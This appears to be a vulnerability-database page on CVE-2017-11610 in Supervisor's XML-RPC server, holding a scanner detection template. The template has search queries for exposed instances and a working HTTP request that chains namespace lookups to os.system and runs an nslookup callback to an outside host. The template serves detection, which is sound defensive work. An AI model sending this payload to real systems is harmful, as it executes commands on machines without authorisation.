| Reporter | Title | Published | Views | Family All 64 |
|---|---|---|---|---|
| Supervisor XML-RPC Authenticated Remote Code Execution Exploit | 25 Sep 201700:00 | – | zdt | |
| Exploit for Code Injection in Microsoft | 27 Nov 202010:59 | – | gitee | |
| Exploit for Code Injection in Microsoft | 25 Nov 202023:04 | – | gitee | |
| Exploit for Code Injection in Microsoft | 17 Nov 202009:07 | – | gitee | |
| Exploit for Incorrect Default Permissions in Supervisord Supervisor | 27 May 202618:44 | – | githubexploit | |
| CVE-2017-11610 | 23 Aug 201700:00 | – | attackerkb | |
| CVE-2017-11610 | 23 Aug 201714:00 | – | alpinelinux | |
| The vulnerability of the XML-RPC web server component in Supervisor and the Fedora/Debian GNU/Linux operating systems allows a perpetrator to execute arbitrary commands. | 13 Sep 201700:00 | – | bdu_fstec | |
| Supervisord -- An authenticated client can run arbitrary shell commands via malicious XML-RPC requests | 24 Jul 201700:00 | – | freebsd | |
| CVE-2017-11610 | 25 Sep 201700:00 | – | circl |
id: CVE-2017-11610
info:
name: XML-RPC Server - Remote Code Execution
author: notnotnotveg
severity: high
description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: |
Apply the latest security patches or disable the XML-RPC server if not required.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
- https://nvd.nist.gov/vuln/detail/CVE-2017-11610
- https://lists.fedoraproject.org/archives/list/[email protected]/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/
- https://lists.fedoraproject.org/archives/list/[email protected]/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/
- http://www.debian.org/security/2017/dsa-3942
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-11610
cwe-id: CWE-276
epss-score: 0.87544
epss-percentile: 0.99733
cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: supervisord
product: supervisor
shodan-query:
- http.title:"Supervisor Status"
- http.title:"supervisor status"
fofa-query: title="supervisor status"
google-query: intitle:"supervisor status"
tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord,vkev,vuln
http:
- raw:
- |
POST /RPC2 HTTP/1.1
Host: {{Hostname}}
Accept: text/xml
Content-type: text/xml
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>nslookup {{interactsh-url}}</string>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: header
words:
- "text/xml"
- type: word
part: body
words:
- "<methodResponse>"
- "<int>"
condition: and
# digest: 490a004630440220663dd8b2f57589d46c59156a265e98cdccd6cae3f5f44edf9248f16d95449dea022074b62fb3b9518deb8d64a8aa0e67d277108cca498e81df8b0393d04fc1cabdf5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation